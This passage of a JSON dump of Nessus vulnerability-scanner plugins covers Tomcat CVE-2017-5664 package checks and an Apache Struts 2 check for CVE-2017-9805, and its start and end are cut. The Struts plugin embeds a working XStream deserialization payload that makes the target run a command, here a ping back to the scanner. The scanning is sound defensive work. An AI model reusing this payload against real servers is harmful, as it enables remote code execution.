exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-8.0.44-1.71.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-admin-webapps-8.0.44-1.71.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-docs-webapp-8.0.44-1.71.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-el-3.0-api-8.0.44-1.71.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-javadoc-8.0.44-1.71.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-jsp-2.3-api-8.0.44-1.71.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-lib-8.0.44-1.71.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-log4j-8.0.44-1.71.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-servlet-3.1-api-8.0.44-1.71.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-webapps-8.0.44-1.71.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat8 / tomcat8-admin-webapps / tomcat8-docs-webapp / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-02-01T07:16:11", "bulletinFamily": "scanner", "description": "This update includes a rebase from 8.0.43 up to 8.0.44 which resolves\na single CVE along with various other bugs/features :\n\n - rhbz#1459160 CVE-2017-5664 tomcat: Security constrained\n bypass in error page mechanism\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "modified": "2020-02-02T00:00:00", "id": "FEDORA_2017-E4638A345C.NASL", "href": "https://www.tenable.com/plugins/nessus/101185", "published": "2017-07-03T00:00:00", "title": "Fedora 24 : 1:tomcat (2017-e4638a345c)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-e4638a345c.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101185);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/09/24 14:09:09\");\n\n script_cve_id(\"CVE-2017-5664\");\n script_xref(name:\"FEDORA\", value:\"2017-e4638a345c\");\n\n script_name(english:\"Fedora 24 : 1:tomcat (2017-e4638a345c)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update includes a rebase from 8.0.43 up to 8.0.44 which resolves\na single CVE along with various other bugs/features :\n\n - rhbz#1459160 CVE-2017-5664 tomcat: Security constrained\n bypass in error page mechanism\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-e4638a345c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 1:tomcat package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"tomcat-8.0.44-1.fc24\", epoch:\"1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"1:tomcat\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-02-01T02:13:25", "bulletinFamily": "scanner", "description": "The remote web application appears to use the Apache Struts 2 web\nframework. A remote code execution vulnerability exists in the REST\nplugin, which uses XStreamHandler to insecurely deserialize\nuser-supplied input in XML requests. An unauthenticated, remote\nattacker can exploit this, via a specially crafted XML request, to\nexecute arbitrary code.\n\nNote that this plugin only reports the first vulnerable instance of a\nStruts 2 application.", "modified": "2020-02-02T00:00:00", "id": "STRUTS_2_5_13_REST_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/102977", "published": "2017-09-06T00:00:00", "title": "Apache Struts 2 REST Plugin XStream XML Request Deserialization RCE", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102977);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\"CVE-2017-9805\");\n\n script_name(english:\"Apache Struts 2 REST Plugin XStream XML Request Deserialization RCE\");\n script_summary(english:\"Attempts to execute arbitrary code.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web application appears to use the Apache Struts 2 web\nframework. A remote code execution vulnerability exists in the REST\nplugin, which uses XStreamHandler to insecurely deserialize\nuser-supplied input in XML requests. An unauthenticated, remote\nattacker can exploit this, via a specially crafted XML request, to\nexecute arbitrary code.\n\nNote that this plugin only reports the first vulnerable instance of a\nStruts 2 application.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-052\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.34\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.13\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lgtm.com/blog/apache_struts_CVE-2017-9805\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/jas502n/St2-052\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.34 or 2.5.13 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-9805\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts REST Plugin XStream RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 REST Plugin XStream RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"torture_cgi_func.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match4 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match4))\n {\n urls = make_list(urls, match4[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\n\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\n\nurls = list_uniq(urls);\nscanner_ip = compat::this_host();\ntarget_ip = get_host_ip();\nvuln = FALSE;\n\nua = get_kb_item(\"global_settings/http_user_agent\");\nif (empty_or_null(ua))\n ua = 'Nessus';\n\npat = hexstr(rand_str(length:10));\n\nos = get_kb_item(\"Host/OS\");\nif (!empty_or_null(os) && \"windows\" >< tolower(os))\n{\n ping_cmd = 'ping</string><string>-n</string><string>3</string><string>-l</string><string>500</string><string>' + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip + \" and greater 500\";\n}\nelse\n{\n ping_cmd = \"ping</string><string>-c</string><string>3</string><string>-p</string><string>\" + pat + \"</string><string>\" + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip;\n}\n\nforeach url (urls)\n{\n soc = open_sock_tcp(port);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n post_payload = '<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\"><dataHandler><dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\"><is class=\"javax.crypto.CipherInputStream\"><cipher class=\"javax.crypto.NullCipher\"><initialized>false</initialized><opmode>0</opmode><serviceIterator class=\"javax.imageio.spi.FilterIterator\"><iter class=\"javax.imageio.spi.FilterIterator\"><iter class=\"java.util.Collections$EmptyIterator\"/><next class=\"java.lang.ProcessBuilder\"><command><string>' +\n ping_cmd +\n '</string></command><redirectErrorStream>false</redirectErrorStream></next></iter><filter class=\"javax.imageio.ImageIO$ContainsFilter\"><method><class>java.lang.ProcessBuilder</class><name>start</name><parameter-types/></method><name>foo</name></filter><next class=\"string\">foo</next></serviceIterator><lock/></cipher><input class=\"java.lang.ProcessBuilder$NullInputStream\"/><ibuffer></ibuffer><done>false</done><ostart>0</ostart><ofinish>0</ofinish><closed>false</closed></is><consumed>false</consumed></dataSource><transferFlavors/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/></entry><entry><jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/><jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/></entry></map>';\n\n attack_url = url;\n\n req =\n 'POST ' + attack_url + ' HTTP/1.1\\n' +\n 'Host: ' + target_ip + ':' + port + '\\n' +\n 'User-Agent: ' + ua + '\\n' +\n 'Accept-Language: en-US\\n' +\n 'Content-Type: application/xml\\n' +\n 'Content-Length: ' + strlen(post_payload) + '\\n' +\n 'Connection: Keep-Alive\\n' +\n '\\n' + post_payload;\n\n s = send_capture(socket:soc,data:req,pcap_filter:filter,timeout:timeout);\n icmp = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n if (\"windows\" >< tolower(os) && !isnull(icmp))\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic. '+\n 'Below is the response :' +\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n else if (pat >< icmp)\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic and looking for'+\n '\\nthe pattern sent in our packet (' + pat + '). Below is the response :'+\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n generic : TRUE,\n request : make_list(vuln_url),\n output : report\n);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-01T06:53:26", "bulletinFamily": "scanner", "description": "Aniket Nandkishor Kulkarni discovered that in tomcat7, a servlet and\nJSP engine, static error pages used the original request", "modified": "2020-02-02T00:00:00", "id": "DEBIAN_DSA-3892.NASL", "href": "https://www.tenable.com/plugins/nessus/101009", "published": "2017-06-23T00:00:00", "title": "Debian DSA-3892-1 : tomcat7 - security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3892. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101009);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2018/11/10 11:49:38\");\n\n script_cve_id(\"CVE-2017-5664\");\n script_xref(name:\"DSA\", value:\"3892\");\n\n script_name(english:\"Debian DSA-3892-1 : tomcat7 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Aniket Nandkishor Kulkarni discovered that in tomcat7, a servlet and\nJSP engine, static error pages used the original request's HTTP method\nto serve content, instead of systematically using the GET method. This\ncould under certain conditions result in undesirable results,\nincluding the replacement or removal of the custom error page.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=864447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=802312\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/tomcat7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/tomcat7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-3892\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the tomcat7 packages.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.0.56-3+deb8u11.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.0.72-3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libservlet3.0-java\", reference:\"7.0.56-3+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libservlet3.0-java-doc\", reference:\"7.0.56-3+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libtomcat7-java\", reference:\"7.0.56-3+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7\", reference:\"7.0.56-3+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7-admin\", reference:\"7.0.56-3+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7-common\", reference:\"7.0.56-3+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7-docs\", reference:\"7.0.56-3+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7-examples\", reference:\"7.0.56-3+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat7-user\", reference:\"7.0.56-3+deb8u11\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libservlet3.0-java\", reference:\"7.0.72-3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libservlet3.0-java-doc\", reference:\"7.0.72-3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-02-01T06:53:26", "bulletinFamily": "scanner", "description": "Aniket Nandkishor Kulkarni discovered that in tomcat8, a servlet and\nJSP engine, static error pages used the original request", "modified": "2020-02-02T00:00:00", "id": "DEBIAN_DSA-3891.NASL", "href": "https://www.tenable.com/plugins/nessus/101008", "published": "2017-06-23T00:00:00", "title": "Debian DSA-3891-1 : tomcat8 - security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3891. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101008);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2018/11/10 11:49:38\");\n\n script_cve_id(\"CVE-2017-5664\");\n script_xref(name:\"DSA\", value:\"3891\");\n\n script_name(english:\"Debian DSA-3891-1 : tomcat8 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Aniket Nandkishor Kulkarni discovered that in tomcat8, a servlet and\nJSP engine, static error pages used the original request's HTTP method\nto serve content, instead of systematically using the GET method. This\ncould under certain conditions result in undesirable results,\nincluding the replacement or removal of the custom error page.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=864447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=802312\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/tomcat8\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/tomcat8\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-3891\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the tomcat8 packages.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 8.0.14-1+deb8u10.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 8.5.14-1+deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libservlet3.1-java\", reference:\"8.0.14-1+deb8u10\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libservlet3.1-java-doc\", reference:\"8.0.14-1+deb8u10\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libtomcat8-java\", reference:\"8.0.14-1+deb8u10\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8\", reference:\"8.0.14-1+deb8u10\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-admin\", reference:\"8.0.14-1+deb8u10\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-common\", reference:\"8.0.14-1+deb8u10\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-docs\", reference:\"8.0.14-1+deb8u10\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-examples\", reference:\"8.0.14-1+deb8u10\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-user\", reference:\"8.0.14-1+deb8u10\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libservlet3.1-java\", reference:\"8.5.14-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libservlet3.1-java-doc\", reference:\"8.5.14-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libtomcat8-embed-java\", reference:\"8.5.14-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libtomcat8-java\", reference:\"8.5.14-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"tomcat8\", reference:\"8.5.14-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"tomcat8-admin\", reference:\"8.5.14-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"tomcat8-common\", reference:\"8.5.14-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"tomcat8-docs\", reference:\"8.5.14-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"tomcat8-examples\", reference:\"8.5.14-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"tomcat8-user\", reference:\"8.5.14-1+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-02-01T02:37:36", "bulletinFamily": "scanner", "description": "According to its self-reported version number, the Apache Tomcat\nservice running on the remote host is 7.0.x prior to 7.0.78, 8.0.x\nprior to 8.0.44, 8.5.x prior to 8.5.15, or 9.0.x prior to 9.0.0.M21.\nIt is, therefore, affected by an implementation flaw in the error \npage reporting mechanism in which it does not conform to the Java \nServlet Specification that requires static error pages to be processed \nas an HTTP GET request nothwithstanding the HTTP request method that \nwas originally used when the error occurred. Depending on the original \nrequest and the configuration of the Default Servlet, an \nunauthenticated, remote attacker can exploit this issue to replace or \nremove custom error pages.\n\nNote that Nessus has not attempted to exploit this issue but has\ninstead relied only on the application", "modified": "2020-02-02T00:00:00", "id": "TOMCAT_8_5_15.NASL", "href": "https://www.tenable.com/plugins/nessus/100681", "published": "2017-06-08T00:00:00", "title": "Apache 